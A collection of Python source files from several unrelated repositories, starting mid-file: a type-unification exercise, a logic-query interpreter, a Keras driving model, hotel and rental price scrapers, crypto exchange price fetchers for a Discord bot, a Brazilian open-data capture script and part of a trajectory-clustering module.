(tree, _) = parse(prefix.strip().split(' '), 0)
return tree
``` |
{
"source": "joaobose/CI3641-exam-2",
"score": 3
} |
#### File: CI3641-exam-2/pregunta-5/type.py
```python
from lark import Lark, Transformer
def return_copy(f):
# Decorador para retonar un deep copy del objeto retonado por f
# Este docorador supone que f retona un objeto de tipo Type
def k(*args):
return f(*args).copy()
return k
class TypeEcuationTerm:
# Representa la ecuacion de tipos left = right
def __init__(self, left, right):
self.left = left
self.right = right
# Retorna la version normalizada de la ecuacion
def norm(self):
if self.left is not VariableType:
return TypeEcuationTerm(self.right, self.left)
return self
# Representacion string
def __str__(self):
return f'{str(self.left)} = {str(self.right)}'
# Hash - para trabajar con el tipo set
def __hash__(self):
return hash(str(self))
# Igualdad de ecuaciones
def __eq__(self, other):
return str(self) == str(other)
class Type:
# Clase tipo base
# La igualda esta dada por la representacion str
def __eq__(self, other):
return str(self) == str(other)
# Definimos la propiedad kind para poder utilizar
# el operardor is, ie: x is ConstType
@property
def kind(self):
return self.__class__
class ConstType(Type):
# Clase tipo constante
def __init__(self, token):
self.token = token
# La representacion es su token
def __str__(self):
return self.token
# No se puede unificar un tipo constante
def unify(self, other):
raise Exception(
f'Error: no se puede unificar {str(other)} con una constante.')
# Copy
def copy(self):
return ConstType(self.token)
# No se puede sustituir dentro de una constante
def replacing_var(self, var, value):
raise Exception(
f'Error: No se pueden reemplazar valores dentro de una constante.')
class VariableType(Type):
# Tipo valiable
def __init__(self, token):
self.token = token
# La representacion str es su token
def __str__(self):
return self.token
# No se puede unificar un tipo variable sin tener contexto
def unify(self, other):
raise Exception(
f'Error: no se puede unificar {str(other)} con una variable sin contexto.')
# Copy
def copy(self):
return VariableType(self.token)
# sustitucion textual
@return_copy
def replacing_var(self, var, value):
if self == var:
return value
return self
class FuncType(Type):
# Tipo funcion
# Tiene el tipo del dominio (domain) y el tipo del rango (target)
def __init__(self, domain, target):
self.domain = domain
self.target = target
# Representacion str
def __str__(self):
domain_str = f'({str(self.domain)})' if self.domain.kind is FuncType else str(
self.domain)
target_str = f'{str(self.target)}'
return f'{domain_str} -> {target_str}'
# Unificacion sobre una aplicacion
@return_copy
def unify(self, other):
if self.domain.kind is ConstType:
assert other == self.domain, f'Error: no se pudo unificar {str(self.domain)} con {str(other)}'
return self.target
if self.domain.kind is VariableType:
if self.target.kind is ConstType:
return self.target
if self.target.kind is VariableType:
return other
if self.target.kind is FuncType:
return self.target.replacing_var(self.domain, other)
if self.domain.kind is FuncType:
assert other.kind is FuncType
# Ecuacion inicial
equations = {TypeEcuationTerm(self.domain, other)}
change = True
while change:
# Removemos ecuaciones de la forma X = X
new_eq = {eq for eq in equations if eq.left != eq.right}
# Reducimos las ecuaciones de funciones a sub-ecuaciones
fun_eq = {
eq for eq in new_eq if eq.left.kind is FuncType and eq.right.kind is FuncType}
new_eq = new_eq - fun_eq
for k in fun_eq:
domain_eq = TypeEcuationTerm(
k.right.domain, k.left.domain).norm()
target_eq = TypeEcuationTerm(
k.right.target, k.left.target).norm()
new_eq.add(domain_eq)
new_eq.add(target_eq)
# Condicion de cambio
change = not (new_eq == equations)
equations = new_eq
# Buscamos inconsistencias -> Const = Const
if len({eq for eq in equations if eq.left.kind is ConstType and eq.right.kind is ConstType}) > 0:
raise Exception(
f'Error: no se puede unificar {str(self.domain)} con {str(other)}.')
# Buscamos inconsistencias
for eq1 in equations:
for eq2 in equations:
# Circular -> a = b and b = a
if eq1.left == eq2.right and eq1.right == eq2.left:
raise Exception(
f'Error: no se puede unificar {str(self.domain)} con {str(other)}. Referencia circular')
# Contradiction -> a = b and a = c
if eq1.left == eq2.left and eq1.right != eq2.right:
raise Exception(
f'Error: no se puede unificar {str(self.domain)} con {str(other)}. Contradiccion')
# Para este punto, todas las ecuaciones son de la forma
# var = t
# con t.kind is not VariableType and var.kind is VariableType
# Reemplazamos las ecuaciones resultantes
result = self.target
for eq in equations:
result = result.replacing_var(eq.left, eq.right)
return result
# Deep copy
def copy(self):
return FuncType(self.domain.copy(), self.target.copy())
# Sustitucion textual
def replacing_var(self, var, value):
copy = self.copy()
# replacing in domain
if copy.domain.kind is not ConstType:
copy.domain = copy.domain.replacing_var(var, value)
# replacing in target
if copy.target.kind is not ConstType:
copy.target = copy.target.replacing_var(var, value)
return copy
class TypeTransformer(Transformer):
# Transformer del parser
def const(self, t):
token, = t
return ConstType(token)
def var(self, t):
token, = t
return VariableType(token)
def func(self, val):
domain, target = val
return FuncType(domain, target)
class TypeParser:
# Parser de Lark
def __init__(self):
self.parser = Lark(r"""
?type: func
| paren
| CONST -> const
| VAR -> var
CONST : /([A-Z])\w*/
VAR : /([a-z])\w*/
func : type "->" type
?paren : "(" type ")"
%import common.WS
%ignore WS
""", start='type', parser='lalr', lexer='contextual')
def parse(self, string):
return self.parser.parse(string)
def transform(self, tree):
return TypeTransformer().transform(tree)
def inter(self, string):
return self.transform(self.parse(string))
# --------------- parse
to_parse = "a -> a -> a"
transformed = TypeParser().inter(to_parse)
print(to_parse) # a -> a -> a
# --------------- unificacion
# ----- domain constant
constant_constant = "Int -> Bool"
constant_constant_t = TypeParser().inter(constant_constant)
correct_constant = "Int"
correct_constant_t = TypeParser().inter(correct_constant)
print(constant_constant_t.unify(correct_constant_t)) # Bool
# # must fail
# wrong_constant = "Bool"
# wrong_constant_t = TypeParser().inter(wrong_constant)
# print(constant_constant_t.unify(wrong_constant_t))
# ----- domain variable and target constant
var_constant = "a -> String"
var_constant_t = TypeParser().inter(var_constant)
whatever = "a -> a"
whatever_t = TypeParser().inter(whatever)
print(var_constant_t.unify(whatever_t)) # String
# ----- domain variable and target variable
var_var = "a -> a"
var_var_t = TypeParser().inter(var_var)
whatever = "a -> a"
whatever_t = TypeParser().inter(whatever)
print(var_var_t.unify(whatever_t)) # a -> a
# ----- domain variable and target function
var_fun = "a -> b -> a -> b -> a"
var_fun_t = TypeParser().inter(var_fun)
whatever = "Bool"
whatever_t = TypeParser().inter(whatever)
print(var_fun_t.unify(whatever_t)) # b -> Bool -> b -> Bool
# ----- domain function and target function
fun_fun = "(b -> T) -> (b -> T)"
fun_fun_t = TypeParser().inter(fun_fun)
whatever = "E -> c"
whatever_t = TypeParser().inter(whatever)
print(fun_fun_t.unify(whatever_t)) # E -> T
``` |
{
"source": "joaobose/CI3641-exam-3",
"score": 3
} |
#### File: pregunta-6/src/database.py
```python
from .libparse import ExpParser
from .datamodel import Atom, Variable, Rule, Struct, merge_scopes, project_scope_to_namespace
class InterpreterDatabase:
def __init__(self):
# Lista de reglas de la base de datos
# Esto incluye hechos. Un hecho f(x) es representado
# por la regla f(x) :- True
self.rules = []
self.parser = ExpParser()
def define(self, raw):
"""Define un hecho o regla en la base datos del interprete"""
# Parseando y validando
expresion = self.parser.inter(raw)
self.validate(expresion)
def_label = 'regla'
if expresion.kind is not Rule:
def_label = 'hecho'
expresion = Rule(expresion, [True])
self.rules.append(expresion)
return def_label, expresion
def parse_ask(self, raw):
"""Parsea la expresion que se utilizara para realizar un query"""
# Parseando y validando
expresion = self.parser.inter(raw)
self.validate(expresion)
if expresion.kind is Rule:
raise Exception(
f'No se puede consultar una regla.')
return expresion
def validate(self, expresion):
"""Valida expresiones introducidas a la base de datos"""
if expresion.kind is Variable:
raise Exception(
f'No se pueden expresar variables fuera de alguna estructura')
if expresion.kind is not Rule:
return
if expresion.consecuente.kind is Variable or \
not expresion.is_fact and any(
[ant.kind is Variable for ant in expresion.antecedentes]):
raise Exception(
f'No se pueden expresar variables fuera de alguna estructura')
@property
def facts(self):
# Sub conjunto de la reglas que sin hechos
return [rule for rule in self.rules if rule.is_fact]
def query(self, query):
"""Realiza una consulta a la base datos"""
# Este metodo es un generator (iterador) de python
# Cada elemento de la secuencia generada es un solucion al query
# None se interpreta como solucion no satifacible
query = query.copy()
# Expandimos soluciones a partir del primer termino del query
canditate = query.pop(0)
# Verificamos si el candidato es un hecho
is_fact = any(
[canditate == fact.consecuente for fact in self.facts])
# Si es un hecho, ese componente de la conjuncion ya es cierto.
if is_fact:
# Si candidate era el unico elemento de la conjuncion.
if len(query) == 0:
# ya toda la conjuncion es cierta
yield set()
else:
# En caso contrario, consultamos al siguente elemento de la conjuncion
for x in self.query(query):
if x is not None:
yield x
else:
# Exploramos posibilidades de unificacion
for unificable in self.rules:
# Si es unificable
if canditate.is_unificable(unificable):
# Unificamos, obtenemos la nueva sub query
sub_scope, sub_query = canditate.unificate(
unificable)
# Reemplazamos el scope de unificacion en el resto de query
_query = [x.textual_sub(sub_scope) for x in query]
# Exploramos si la sub query es satisfacible (DFS)
for sub_query_result in self.query(sub_query):
# Si la sub query satisfacio a candidate.
if sub_query_result is not None:
# Reemplazamos el scope resultante en el resto de query
rest_query = [x.textual_sub(
sub_query_result) for x in _query]
# Agregamos el scope resultante al scope
rest_scope = project_scope_to_namespace(merge_scopes(
sub_scope, sub_query_result), canditate.namespace)
# Si el scope da contradiccion. Esta rama no tiene solucion.
if rest_scope is None:
continue
if len(rest_query) == 0:
# ya toda la conjuncion es cierta
yield rest_scope
else:
# En caso contrario, consultamos al siguente elemento de la conjuncion
for x in self.query(rest_query):
if x is not None:
yield merge_scopes(rest_scope, x)
# Si por ninguno de los caminos pudimos satisfacer candidate
# Entonces candidate es no satisfacible.
# la conjuncion es false por corto circuito
yield None
``` |
{
"source": "JoaoBSobrinho/MOHID_python_tools",
"score": 3
} |
#### File: HDF5_maps_with_cartopy/src/grid_to_center_cells.py
```python
import numpy as np
def lonlat_grid_to_center_cells(lon_grd, lat_grd):
n_lines = lon_grd.shape[0]
n_columns = lon_grd.shape[1]
lon_cen = np.zeros((n_lines-1, n_columns-1))
lat_cen = np.zeros((n_lines-1, n_columns-1))
for i in range(0,n_lines-1):
lon_i = lon_grd[i]
lat_i = lat_grd[i]
lon_i1 = lon_grd[i+1]
lat_i1 = lat_grd[i+1]
for j in range(0,n_columns-1):
XSW = lon_i[j]
YSW = lat_i[j]
XSE = lon_i[j+1]
YSE = lat_i[j+1]
XNE = lon_i1[j+1]
YNE = lat_i1[j+1]
XNW = lon_i1[j]
YNW = lat_i1[j]
lon_cen[i][j] = (XSW + XSE + XNE + XNW) / 4.0
lat_cen[i][j]= (YSW + YSE + YNE + YNW) / 4.0
return (lon_cen, lat_cen)
``` |
{
"source": "joaocaldeira/keras-vis",
"score": 3
} |
#### File: applications/self_driving/model.py
```python
from keras.layers.core import Dropout, Flatten
from keras.layers.convolutional import MaxPooling2D, Conv2D
from keras.models import Model
from keras.layers import Input, Dense
FRAME_H = 70
FRAME_W = 180
def build_model():
inp = Input(shape=(FRAME_H, FRAME_W, 3))
x = Conv2D(filters=8, kernel_size=(5, 5), activation='relu')(inp)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(filters=16, kernel_size=(5, 5), activation='relu')(x)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(filters=32, kernel_size=(5, 5), activation='relu')(x)
x = MaxPooling2D((2, 2))(x)
x = Flatten()(x)
x = Dropout(0.5)(x)
x = Dense(128, activation='relu')(x)
x = Dropout(0.5)(x)
x = Dense(1, activation='tanh')(x)
return Model(inputs=[inp], outputs=[x])
if __name__ == '__main__':
model = build_model()
model.summary()
``` |
{
"source": "joaocamargo/estudos-python",
"score": 3
} |
#### File: BookingScraper-joao_v2/BookingScraper/airbnb.py
```python
import argparse
import argcomplete
from argcomplete.completers import ChoicesCompleter
from argcomplete.completers import EnvironCompleter
import requests
from bthread import BookingThread
from bs4 import BeautifulSoup
from file_writer import FileWriter
hotels = []
def get_countries():
with open("europa2020.txt", "r") as f:
countries = f.read().splitlines()
return countries
def get_booking_page(session, offset, rooms, country, dest_id, DayIni, DayFim):
print('get_booking_page(session, offset, rooms, country, dest_id, DayIni, DayFim):')
print(session, offset, rooms, country, dest_id, DayIni, DayFim)
diaInicial = str(int(DayIni[0:2]))
mesInicial = str(int(DayIni[3:5]))
anoInicial = str(int(DayIni[6:10]))
diaFinal = str(int(DayFim[0:2]))
mesFinal = str(int(DayFim[3:5]))
anoFinal = str(int(DayFim[6:10]))
'''
Make request to airbnb page and parse html
:param offset:
:return: html page
'''
url = 'https://www.airbnb.com.br/s/Londres/'\
'homes?refinement_paths%5B%5D=%2Fhomes¤t_tab_id=home_tab&selected_tab_id=home_tab&source=mc_search_bar&search_type=unknown'\
'&click_referer=t%3ASEE_ALL%7Csid%3A874f16ee-6196-4289-9717-17dec73e1e5c%7Cst%3AMAGAZINE_HOMES&screen_size=large&hide_dates_and_guests_filters=false'\
'&ne_lat=51.80546533345978&ne_lng=0.4969575708007312&sw_lat=51.17528882051496&sw_lng=-0.8200285131836154&zoom=10&search_by_map=false&checkin={anoInicial}-{mesInicial}-{diaInicial}'\
'&checkout={anoFinal}-{mesFinal}-{diaFinal}&adults={rooms}&property_type_id%5B%5D=1&property_type_id%5B%5D=43&property_type_id%5B%5D=47'\
'&place_id=ChIJdd4hrwug2EcRmSrV3Vo6llI&room_types%5B%5D=Entire%20home%2Fapt'\
'§ion_offset=6&items_offset=18'.format(rooms=rooms, country=country.replace(' ', '+'),anoFinal=anoFinal,mesFinal=mesFinal,diaInicial=diaInicial,mesInicial=mesInicial,anoInicial=anoInicial,diaFinal=diaFinal,dest_id=dest_id) + str(offset)
r = requests.get(url, headers=
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0)'
' Gecko/20100101 Firefox/48.0'})
html = r.content
print(url)
parsed_html = BeautifulSoup(html, 'lxml')
return parsed_html
def process_hotels(session, offset, rooms, country, dest_id, DayIni, DayFim):
parsed_html = get_booking_page(session, offset, rooms, country, dest_id,DayIni, DayFim)
hotel = parsed_html.find_all('div', {'class': 'sr_item'})
for ho in hotel:
#print("ho.find('a', {'class': 'jq_tooltip'})")
#print(ho.find('a', {'class': 'jq_tooltip'}))
#name = ho.find('a', {'class': 'jq_tooltip'})['data-title']
print("ho.find('span', {'class': 'sr-hotel__name'})")
#print(ho.find('span', {'class': 'sr-hotel__name'}))
if ho.find('span', {'class': 'sr-hotel__name'}) is not None:
name = str(ho.find('span', {'class': 'sr-hotel__name'}).text.encode('utf-8')).replace('\\n','').replace("b","").replace("'","").replace('\\','')
else:
name = '-1'
if ho.find('div', {'class': 'bui-price-display__value prco-inline-block-maker-helper'}) is not None:
price = ho.find('div', {'class': 'bui-price-display__value prco-inline-block-maker-helper'}).text.replace('\n','').replace("b","").replace("'","")
else:
price = '-1'
if ho.find('span', {'class': '_ky9opu0'}) is not None:
nota = str(ho.find('span', {'class': '_ky9opu0'}).text.replace('\n','').replace("b","").replace("'",""))
else :
nota = '-1'
if ho.find('span', {'title': 'This is the straight-line distance on the map. Actual travel distance may vary.'}) is not None:
distance = str(ho.find('span', {'title': 'This is the straight-line distance on the map. Actual travel distance may vary.'}).text.encode('utf-8')).replace('\\n','').replace("b","").replace("'","").replace('\\','')
else :
distance = '-1'
# if ho.find('a', {'class': 'bui-link'}) is not None :
# result = [str(item) for item in ho.find_all('span', attrs={'data-bui-component' : 'Tooltip'})]
# print('TAMANHO TOOLTIP', str(len(result)))
# for i in result:
# print(i)
# for i in result:
# if i in 'km':
# distance = str(i)
# else:
# distance = '----'
# else:
# distance = '----'
# if len(result) ==1:
# if result[0] in 'km':
# distance = result
# else:
# distance = 'aaaaa' + str(len(result))
# else:
# distance = '---'
hotels.append(DayIni+';'+DayFim+';'+name + ';' + price + ';' + nota + ';' + distance)
#hotels.append(str(len(hotels) + 1) + ' : ' + name + ' : ' + price)
def prep_data(rooms=1, country='Macedonia', dest_id='-1', DayIni='01/01/2019', DayFim='02/01/2019', out_format=None):
'''
Prepare data for saving
:return: hotels: set()
'''
offset = 1
session = requests.Session()
parsed_html = get_booking_page(session, offset, rooms, country, dest_id, DayIni,DayFim)
all_offset = parsed_html.find_all('li', {'class':
'sr_pagination_item'})[-1].get_text().splitlines()[-1]
threads = []
for i in range(int(all_offset)):
offset += 1
t = BookingThread(session, offset, rooms, country,dest_id,DayIni, DayFim, process_hotels)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
hotels2 = hotels
return hotels2
def get_data(rooms=1, country='Macedonia', dest_id='-1',DayIni='01/01/2019',DayFim='02/01/2019', out_format=None):
'''
Get all accomodations in Macedonia and save them in file
:return: hotels-in-macedonia.{txt/csv/xlsx} file
'''
print('Procurando por',country)
hotels_list = prep_data(rooms, country,dest_id, DayIni, DayFim, out_format)
save_data(hotels_list , out_format=out_format, country=country)
def save_data(data, out_format, country):
'''
Saves hotels list in file
:param data: hotels list
:param out_format: json, csv or excel
:return:
'''
writer = FileWriter(data, out_format, country)
file = writer.output_file()
print('All accommodations are saved.')
print('You can find them in', file, 'file')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
countries = get_countries()
parser.add_argument("--rooms",
help='Add the number of rooms to the booking request.',
default=1,
type=int,
nargs='?')
parser.add_argument("--country",
help='Add the country to the booking request.',
default='Macedonia',
nargs='?').completer = ChoicesCompleter(countries)
parser.add_argument("--dest_id",
help='Add the country to the booking request.',
default='0',
nargs='?')
parser.add_argument("--DayIni",
help='Data inicial',
default='01/01/2019',
nargs='?')
parser.add_argument("--DayFim",
help='Data inicial',
default='02/01/2019',
nargs='?')
parser.add_argument("--out_format",
help='Add the format for the output file. Add excel, json or csv.',
default='json',
choices=['json', 'excel', 'csv'],
nargs='?').completer = EnvironCompleter
argcomplete.autocomplete(parser)
args = parser.parse_args()
localidades = [{
'Pais': 'London',
'dest_id': '-2601889'
}, {
'Pais': 'Utrecht',
'dest_id': '-2154382'
}, {
'Pais': 'Buzios',
'dest_id': '-626254'
}, {
'Pais': '',
'dest_id': ''
}]
countryAux = [d['Pais'] for d in localidades if args.dest_id in d['dest_id']]
if len(countryAux)>0:
country = countryAux[0]
print('Parametros')
print(args.rooms, country,args.dest_id,args.DayIni,args.DayFim, args.out_format)
get_data(args.rooms, country,args.dest_id,args.DayIni,args.DayFim, args.out_format)
else:
country = 'Nao Identificado'
locais = [d['Pais'] + ':' + d['dest_id'] for d in localidades if d['Pais'] != '']
print('----------')
print('Utilize uma das seguintes localizações')
for i in locais:
print(i)
print('----------')
```
#### File: BookingScraper-joao_v2/BookingScraper/file_writer.py
```python
class FileWriter:
#TODO: cleanup output_file
def __init__(self, data, out_format=None, country='Macedonia'):
self.data = data
self.format = out_format
self.country= country
def output_file(self):
'''
Write list of hotels in file
:return:
'''
format = self.format.lower()
file_name = ''
if format == 'json' or format is None:
import json
file_name = 'hotels-in-{country}.txt'.format(
country=self.country.replace(" ", "-"))
with open(file_name, 'w') as outfile:
json.dump(list(self.data), outfile, indent=2, ensure_ascii=False)
elif format == 'excel':
from openpyxl import Workbook
wb = Workbook()
ws = wb.active
heading1 = '#'
heading2 = 'Accommodation'
ws.cell(row=1, column=1).value = heading1
ws.cell(row=1, column=2).value = heading2
for i, item in enumerate(self.data):
# Extract number and title from string
tokens = item.split()
n = tokens[0]
title = ' '.join(tokens[2:])
ws.cell(row=i + 2, column=1).value = n
ws.cell(row=i + 2, column=2).value = title
file_name = 'hotels-in-{country}.xls'.format(
country=self.country.replace(" ", "-"))
wb.save(file_name)
elif format == 'csv':
file_name = 'hotels-in-{country}.csv'.format(
country=self.country.replace(" ", "-"))
with open(file_name, 'w') as outfile:
for i, item in enumerate(self.data):
# Extract number and title from string
tokens = item.split()
n = tokens[0]
title = ' '.join(tokens[2:])
s = n + ', ' + title + '\n'
outfile.write(s)
return file_name
``` |
{
"source": "JoaoCampos89/0xbtc-discord-price-bot",
"score": 3
} |
#### File: 0xbtc-discord-price-bot/exchanges/enclavesdex.py
```python
import websocket
import json
from .base_exchange import BaseExchangeAPI
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
class EnclavesAPI(BaseExchangeAPI):
def __init__(self, currency_symbol):
super().__init__()
self._WEBSOCKET_URL = "ws://app.enclaves.io:80/socket.io/?EIO=3&transport=websocket";
if currency_symbol == "0xBTC":
self._CONTRACT_ADDRESS = '0xb6ed7644c69416d67b522e20bc294a9a9b405b31'
elif currency_symbol == "XXX":
self._CONTRACT_ADDRESS = '0x0000000000000000000000000000000000000000'
else:
raise RuntimeError("Unknown currency_symbol {}, need to add address to enclavesdex.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "Enclaves DEX"
self.command_names = ['enclaves', 'encalves']
self.short_url = "https://bit.ly/2rnYA7b"
async def _update(self, timeout=10.0):
ws = websocket.create_connection(self._WEBSOCKET_URL, timeout=timeout)
# real implementations read session id etc first so we do the same
result = ws.recv()
result = ws.recv()
# request actual data
ws.send('42["getTokens"]')
result = ws.recv()
try:
all_data = json.loads(result[2:])
except json.decoder.JSONDecodeError:
if "be right back" in response:
raise TimeoutError("api is down - got 404 page")
else:
raise TimeoutError("api sent bad data ({})".format(repr(response)))
data_was_updated = False
tokens = all_data[1]['tokens']
for token in tokens:
if token['addr'] == self._CONTRACT_ADDRESS:
self.price_eth = float(token['priceEnclaves'])
self.volume_eth = wei_to_ether(token['volumeEther'])
self.change_24h = float(token['change'])
data_was_updated = True
if self.price_eth == self.volume_eth == self.change_24h == 0.0:
raise TimeoutError('All values from enclaves read 0')
if not data_was_updated:
raise RuntimeError('Response from Enclaves did not include indicated currency ({}).'.format(self.currency_symbol))
if __name__ == "__main__":
e = EnclavesAPI('0xBTC')
e.load_once_and_print_values()
```
#### File: JoaoCampos89/0xbtc-discord-price-bot/formatting_helpers.py
```python
import datetime
import platform
def unix_timestamp_to_readable_date(timestamp):
time = datetime.datetime.fromtimestamp(timestamp)
if platform.system() == "Linux":
return time.strftime("%a %B %-e %Y")
else:
return time.strftime("%a %B %#e %Y")
def unix_timestamp_to_readable_date_time(timestamp):
# TODO: implement
time = datetime.datetime.fromtimestamp(timestamp)
if platform.system() == "Linux":
return time.strftime("%a %B %-e %Y")
else:
return time.strftime("%a %B %#e %Y")
def string_to_float(value):
"""custom version of float() that supports commas as decimal separators
when the input contains no periods"""
# if no periods (.) then assume commas are decimal separators
if '.' not in value:
value = value.replace(',', '.')
# if decimals exist then simply remove commas
else:
value = value.replace(',', '')
return float(value)
def percent_change_to_emoji(percent_change):
values = [
# [0.3, ":arrow_up:"],
# [0.1, ":arrow_upper_right:"],
# [-0.1, ":arrow_right:"],
# [-0.3, ":arrow_lower_right:"],
# [-1, ":arrow_down:"],
[0.3, ":chart_with_upwards_trend:"],
[0.1, ""],
[-0.1, ""],
[-0.3, ""],
[-1, ":chart_with_downwards_trend:"],
]
for v in values:
if percent_change > v[0]:
return v[1]
# return the last option as fallback
return values[-1:][0][1]
def round_to_n_decimals(x, n=1):
from math import log10, floor
assert n >= 1
return round(x, -int(floor(log10(abs(x))))+n-1)
def prettify_decimals(number):
if number == 0:
return "0"
if number < 1e-12:
rounded = round_to_n_decimals(number, 3)
return "{:.2e}".format(rounded)
if number < 1.0:
rounded = round_to_n_decimals(number, 3)
return "{:.14f}".format(rounded).rstrip("0")
if number < 10.0:
rounded = round_to_n_decimals(number, 4)
return "{:.3f}".format(rounded)
if number < 10000.0:
return "{:.2f}".format(number)
if number < 1e9:
return "{:,.0f}".format(number)
if number < 1e15:
return to_readable_thousands(number, unit_type='long')
return "{:.2e}".format(number).replace("+", "")
def to_readable_thousands(value, unit_type='short', decimals=1):
if unit_type == "long":
units = ['', ' thousand', ' million', ' billion', ' trillion', ' quadrillion', ' sextillion', ' septillion', ' octillion', ' nonillion']
if unit_type == "short":
units = ['', 'k', 'm', 'b', 't', 'p', 's']
if unit_type == "hashrate":
units = ['H/s', ' Kh/s', ' Mh/s', ' Gh/s', ' Th/s', ' Ph/s', ' Eh/s', ' Zh/s', ' Yh/s']
if unit_type == "short_hashrate":
units = ['H', ' Kh', ' Mh', ' Gh', ' Th', ' Ph', ' Eh', ' Zh', ' Yh']
for unit in units:
if value < 1000:
return "{:.1f}{}".format(value, unit)
value /= 1000
fmt_str = "{:." + str(decimals) + "f}{}"
return fmt_str.format(value*1000, units[-1])
def seconds_to_n_time_ago(seconds):
if seconds < 60:
return 'now'
minutes = seconds / 60
if minutes < 60:
return "{:.0f}m ago".format(minutes)
return "{:.0f}h ago".format(minutes / 60)
def seconds_to_time(seconds, granularity=2):
result = []
intervals = (
('centuries', 60*60*24*7*4.34524*12*10*10),
('decades', 60*60*24*7*4.34524*12*10),
('years', 60*60*24*7*4.34524*12),
('months', 60*60*24*7*4.34524),
('weeks', 60*60*24*7),
('days', 60*60*24),
('hours', 60*60),
('minutes', 60),
('seconds', 1),
)
if seconds == 0:
return '0 seconds'
for name, multiplier in intervals:
value = seconds // multiplier
if value > 0:
seconds -= value * multiplier
if value == 1:
name = name.rstrip('s')
result.append("{:.0f} {}".format(value, name))
return ', '.join(result[:granularity])
``` |
{
"source": "JoaoCarabetta/brasilio-package",
"score": 3
} |
#### File: brasilio-package/src/capture.py
```python
import requests
import tools
import os
def me_liberte(url, filename , verbose=False):
if verbose:
print('Downloading')
print(url)
res = requests.get(url)
with open(os.path.join(tools.output_path, filename), 'w+') as f:
f.write(res.text)
tools.generate_resources(filename, verbose=verbose)
return res
if __name__ == '__main__':
# Ajuda <NAME> a libertar esses dados!
prisioneiros = [
{'cela':'http://www.ispdados.rj.gov.br/Arquivos/UppEvolucaoMensalDeTitulos.csv',
'nome': 'evolucao-seguranca-upp-rj.csv',
'type':'csv'},
{'cela':'http://www.ispdados.rj.gov.br/Arquivos/ArmasDP2003_2006.csv',
'nome': 'apreensao-armas-por-dp-rj.csv',
'type':'csv'},
]
verbose=True
with tools.Brasilio(verbose=verbose) as gilmar_mendes:
for prisioneiro in prisioneiros:
me_liberte(prisioneiro['cela'],
filename=prisioneiro['nome'],
verbose=verbose)
```
#### File: brasilio-package/src/tools.py
```python
import rows
import os
from timeit import default_timer
import json
output_path = '../package/data/'
class Brasilio(object):
def __init__(self, output_path='../package/data/', verbose=False):
self.verbose = verbose
self.output_path = output_path
self.timer = default_timer
def __enter__(self):
# Cria diretório package
if not os.path.exists(self.output_path):
os.makedirs(self.output_path)
# Cria resouces.py vazio
json.dump([], open("resources.json", "w"), indent=2)
# Start Timer
self.start = self.timer()
return self
def __exit__(self, *args):
# Cria datapackage
create_datapackage(self.output_path, verbose=False)
# End Timer
end = self.timer()
self.elapsed_secs = end - self.start
self.elapsed = self.elapsed_secs # millisecs
if self.verbose:
print('Sucesso!\n Sua captura demorou: {0:.2f} s'.format(self.elapsed))
def generate_resources(filename, verbose=False):
data_path = os.path.join(output_path, filename)
if verbose:
print('Reading Data')
data = rows.import_from_csv(data_path)
translate = {int: 'integer',
str: 'string'}
resource = {'format': "csv",
"url": "http://brasil.io/dataset/{}?format=csv".format(filename.split('.')[0]),
"path": data_path,
"profile": "tabular-data-resource",
'schema': {
'fields': []}
}
for i, field in enumerate(data.field_names):
resource['schema']['fields'].append({'name': field,
'type': translate[data.field_types[i].TYPE[0]]})
if verbose:
print('Writing resources.json')
# print(type(resources))
# print(json.dumps(resources))
resources = json.load(open("resources.json", "r"))
resources.append(resource)
json.dump(resources, open("resources.json", "w"), indent=2)
def create_datapackage(output_path, verbose=False):
# Criar o datapackage.json
if verbose:
print("Criando datapackage.json")
with open("metadata.json", "r") as mfd:
output = json.load(mfd)
with open("resources.json", "r") as rfd:
output['resources'] = json.load(rfd)
with open("../package/datapackage.json", "w") as datapackage:
json.dump(output, datapackage, indent=2)
if __name__ == '__main__':
pass
``` |
{
"source": "JoaoCarabetta/PyMove",
"score": 3
} |
#### File: models/pattern_mining/clustering.py
```python
from typing import Callable, Dict, Optional, Text, Union
import numpy as np
from pandas import DataFrame
from sklearn.cluster import DBSCAN, KMeans
from pymove.utils.constants import EARTH_RADIUS, LATITUDE, LONGITUDE, N_CLUSTER
from pymove.utils.conversions import meters_to_eps
from pymove.utils.log import progress_bar, timer_decorator
@timer_decorator
def elbow_method(
move_data: DataFrame,
k_initial: Optional[int] = 1,
max_clusters: Optional[int] = 15,
k_iteration: Optional[int] = 1,
random_state: Optional[int] = None
) -> Dict:
"""
Determines the optimal number of clusters in the range set by the user using
the elbow method.
Parameters
----------
move_data : dataframe
The input trajectory data.
k_initial: int, optional
The initial value used in the interaction of the elbow method.
Represents the maximum numbers of clusters, by default 1
max_clusters: int, optional
The maximum value used in the interaction of the elbow method.
Maximum number of clusters to test for, by default 15
k_iteration: int, optional
Increment value of the sequence used by the elbow method, by default 1
random_state: int, RandomState instance
Determines random number generation for centroid initialization.
Use an int to make the randomness deterministic, by default None
Returns
-------
dict
The inertia values for the different numbers of clusters
Example
-------
clustering.elbow_method(move_data=move_df, k_iteration=3)
{
1: 55084.15957839036,
4: 245.68365592382938,
7: 92.31472644640075,
10: 62.618599956870355,
13: 45.59653757292055,
}
"""
message = 'Executing Elbow Method to:\n...K of %srs to %srs from k_iteration:%srs\n'
message = message % (k_initial, max_clusters, k_iteration)
print(message, flush=True)
inertia_dic = {}
for k in progress_bar(range(k_initial, max_clusters + 1, k_iteration)):
km = KMeans(n_clusters=k, random_state=random_state)
inertia_dic[k] = km.fit(move_data[[LATITUDE, LONGITUDE]]).inertia_
return inertia_dic
@timer_decorator
def gap_statistic(
move_data: DataFrame,
nrefs: Optional[int] = 3,
k_initial: Optional[int] = 1,
max_clusters: Optional[int] = 15,
k_iteration: Optional[int] = 1,
random_state: Optional[int] = None
) -> Dict:
"""
Calculates optimal clusters numbers using Gap Statistic from Tibshirani,
<NAME>.
Parameters
----------
move_data: ndarray of shape (n_samples, n_features).
The input trajectory data.
nrefs: int, optional
number of sample reference datasets to create, by default 3
k_initial: int, optional.
The initial value used in the interaction of the elbow method, by default 1
Represents the maximum numbers of clusters.
max_clusters: int, optional
Maximum number of clusters to test for, by default 15
k_iteration:int, optional
Increment value of the sequence used by the elbow method, by default 1
